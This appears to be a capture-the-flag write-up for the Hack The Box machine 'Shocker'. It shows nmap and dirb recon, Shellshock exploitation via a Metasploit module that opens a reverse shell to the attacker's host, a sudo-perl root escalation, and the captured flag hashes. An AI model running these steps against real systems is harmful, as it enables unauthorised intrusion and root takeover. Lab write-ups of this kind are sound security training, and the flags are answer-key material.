Skip to content

Overview

Machine Info

image-20210702003415236

Walkthrough

Recon

nmap

PORT     STATE SERVICE REASON  VERSION
80/tcp   open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQD8ArTOHWzqhwcyAZWc2CmxfLmVVTwfLZf0zhCBREGCpS2WC3NhAKQ2zefCHCU8XTC8hY9ta5ocU+p7S52OGHlaG7HuA5Xlnihl1INNsMX7gpNcfQEYnyby+hjHWPLo4++fAyO/lB8NammyA13MzvJy8pxvB9gmCJhVPaFzG5yX6Ly8OIsvVDk+qVa5eLCIua1E7WGACUlmkEGljDvzOaBdogMQZ8TGBTqNZbShnFH1WsUxBtJNRtYfeeGjztKTQqqj4WD5atU8dqV/iwmTylpE7wdHZ+38ckuYL9dmUPLh4Li2ZgdY6XniVOBGthY5a2uJ2OFp2xe1WS9KvbYjJ/tH
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPiFJd2F35NPKIQxKMHrgPzVzoNHOJtTtM+zlwVfxzvcXPFFuQrOL7X6Mi9YQF9QRVJpwtmV9KAtWltmk3qm4oc=
|   256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC/RjKhT/2YPlCgFQLx+gOXhC6W3A3raTzjlXQMT8Msk
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Web Enumeration

image-20210702003910031

Ξ OldBoxes/shocker  dirb http://10.10.10.56                                    

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Fri Jul  2 00:44:44 2021
URL_BASE: http://10.10.10.56/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.10.56/ ----
+ http://10.10.10.56/cgi-bin/ (CODE:403|SIZE:294)                                                                                                     
+ http://10.10.10.56/index.html (CODE:200|SIZE:137)

Exploitation

PHP CGI ShellShock RCE

Ξ HTB/Boxes  msfconsole
msf6 > use exploit/multi/http/apache_mod_cgi_bash_env_exec

msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set rhosts 10.10.10.56
rhosts => 10.10.10.56

msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set lhost tun0
lhost => tun0

msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set targeturi http://10.10.10.56/cgi-bin/user.sh
targeturi => http://10.10.10.56/cgi-bin/user.sh

msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > exploit 

[*] Started reverse TCP handler on 10.10.14.27:4444 
[*] Command Stager progress - 100.46% done (1097/1092 bytes)
[*] Sending stage (36 bytes) to 10.10.10.56
[*] Command shell session 1 opened (10.10.14.27:4444 -> 10.10.10.56:54578) at 2021-07-02 01:07:49 -0400

image-20210702010911564

cd /home
ls
shelly
cd shelly
cat user.txt
3b57ccf9e22e42963b66361538597f4b

Privilege Escalation

Enumerate SUID

sudo -l 
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl

Obtaining Root Privileges

sudo /usr/bin/perl -e 'exec "/bin/sh";'
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
cat root.txt
ae449b79adfb43de491e9bf4bc2a9c19